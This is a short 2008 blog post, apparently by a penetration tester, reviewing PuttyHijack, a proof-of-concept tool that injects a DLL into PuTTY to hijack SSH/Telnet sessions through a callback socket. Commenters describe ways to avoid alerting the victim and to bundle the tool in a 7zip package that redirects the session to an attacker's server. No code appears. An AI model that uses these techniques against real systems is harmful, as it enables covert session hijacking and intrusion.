Monday, August 4, 2008

From the announcement:PuttyHijack is a POC tool that injects a dll into the Putty process to hijack an existing, or soon to be created, connection.

This can be useful during penetration tests when a windows box that has been compromised is used to SSH/Telnet into other servers.

The injected DLL installs some hooks and creates a socket for a callback connection that is then used for input/output redirection.

It does not kill the current connection, and will cleanly uninjectif the socket or process is stopped.

Works as described.

Issues:* only works if putty is already running, otherwise it has nothing to hook. So in its current state its cute but not usable.

Comments:*what would be handy would be for the tool to run and wait for putty to start then do the hooking.*low tech solution of just replacing the putty link with a bat file calling both putty.exe and puttyhijack thus far is not working :-(*source is included so realistically i should shut up and just fire up visual studio

5 comments:

ChrisJohnRiley
said...

I'm sure a short shell script would work to check the status of PuTTY and wait for it to be launched. That way you wouldn't alert the user/victim by kicking off a PuTTY session witout them asking. You can just run the script, sit back and wait ;)

Couldn't you have a 7zip executeable that is set to extract putty.exe rocess.exe, the dll and puttyhijack.exe, then run putty, process.exe (to get the pid) then call puttyhijack with the pid past through and a redirect to the attackers server.